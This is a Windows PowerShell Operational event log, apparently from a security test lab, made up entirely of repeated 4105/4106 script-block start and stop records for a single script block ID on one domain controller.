TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467416
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467415
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467414
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467413
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467412
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467411
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467410
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467409
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467408
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467407
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467406
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467405
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467404
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467403
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467402
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467401
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467400
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467399
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467398
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467397
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467396
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467395
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467394
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467393
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467392
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467391
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467390
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467389
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467388
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467387
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467386
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467385
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467384
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467383
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467382
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467381
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467380
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467379
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467378
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467377
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467376
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467375
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467374
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467373
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467372
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467371
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467370
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467369
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467368
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467367
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467366
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467365
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467364
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467363
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467362
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467361
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
